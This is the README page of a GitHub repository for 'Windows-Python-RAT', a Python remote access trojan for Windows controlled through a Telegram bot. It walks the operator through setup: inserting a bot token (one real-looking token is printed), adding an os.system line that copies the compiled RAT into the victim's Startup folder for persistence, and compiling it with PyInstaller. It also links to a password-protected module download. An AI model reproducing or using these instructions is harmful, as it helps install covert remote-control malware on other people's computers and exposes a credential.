← 返回首页
Windows-Python-RAT/README.md at mater · The404Hacking/Windows-Python-RAT · GitHub
Skip to content

Navigation Menu

Toggle navigation
Sign in
Appearance settings
Search or jump to...

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

Saved searches

Use saved searches to filter your results more quickly

Appearance settings
Resetting focus

Latest commit

 

History

History
141 lines (99 loc) · 4.88 KB
 mater
Top

File metadata and controls

  • Preview
  • Code
  • Blame
141 lines (99 loc) · 4.88 KB

Windows-Python-RAT

Microsoft Windows Remote Administrator Tool

Language: Python
Coder: Sir.4m1R
Developer: Ahoora Mansouri
Powered By The404Hacking
Digital Security ReSearch Group

Robot for initial Windows-Python-RAT testing

Bot ID: @W_P_RAT_Bot

Token: 586363223:AAHSLdPnAE60avs_T25l_HjzRahtw6PhxDY

Set Bot API-Token

To replace your robot Token in RAT, simply go to Line 35 in the Windows-Python-RAT.py file and place your API-TOKEN instead of TOKEN.

In Line 35:

#Replace Your Bot API-TOKEN update = Updater("TOKEN")

Example for Replace Token:

StartUP Setting

For startup setting, you must first write the name of your bot before compiling it in the Windows-Python-RAT.py file. For example, before compiling the RAT file, you need to go to line 281 and name it as an YOUR-COMPILED-RAT-NAME.exe.

In Line 281:

os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"') #replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe'

Video Tutorial Setting Up a Startup on a RAT: Watch

Python

Windows-Python-RAT requires Python version 2.7.x

Download Python Version 2.7.13: Click Here

Download Python

Python 2.7.14 - 2017-09-16

Download for Windows (.msi)

Install Python

Learning Install Python on Microsoft Windows: Click Here

Module in Python

To use the Windows-Python-RAT, you need to install the following modules in your python.

For automatic installation, you can first open the Setup.py (python Setup.py) file and select the [1] Install Module option.

To install the modules manually, simply enter the commands for installing each module in your CMD or Terminal.

Module List:

  • Upgrade pip

python -m pip install --upgrade pip

  • Python Telegram Bot (Telegram API for Python)

python -m pip install python-telegram-bot

  • Pyttsx (for Play Voice)

python -m pip install pyttsx

  • PyInstaller (for Compile py file)

python -m pip install pyinstaller

  • Autopy (for Take Screenshot)

Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.

Password autopy-[@The404Hacking].rar File is: @The404Hacking

AutoPy Module in Python

learning Install AutoPy Module on Python 2: Watch

Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.

Password autopy-[@The404Hacking].rar File is: @The404Hacking

Clone and Run Setup

  • Linux:
git clone ‎https://github.com/The404Hacking/Windows-Python-RAT.git cd Windows-Python-RAT python Setup.py
  • Windows:
Download from ‎https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip Windows-Python-RAT-master.zip Extract files. cd Windows-Python-RAT python Setup.py

Logo:

Setup ScreenShot:

RAT Control Panel @W_P_RAT_Bot:

Download and Clone

Download: Click Here

Clone: git clone https://github.com/The404Hacking/Windows-Python-RAT.git

The404Hacking | Digital UnderGround Team

The404Hacking

Follow us !

The404Hacking - The404Cracking

Instagram - GitHub

YouTube - Aparat

Blog - Email

Footer

© 2026 GitHub, Inc.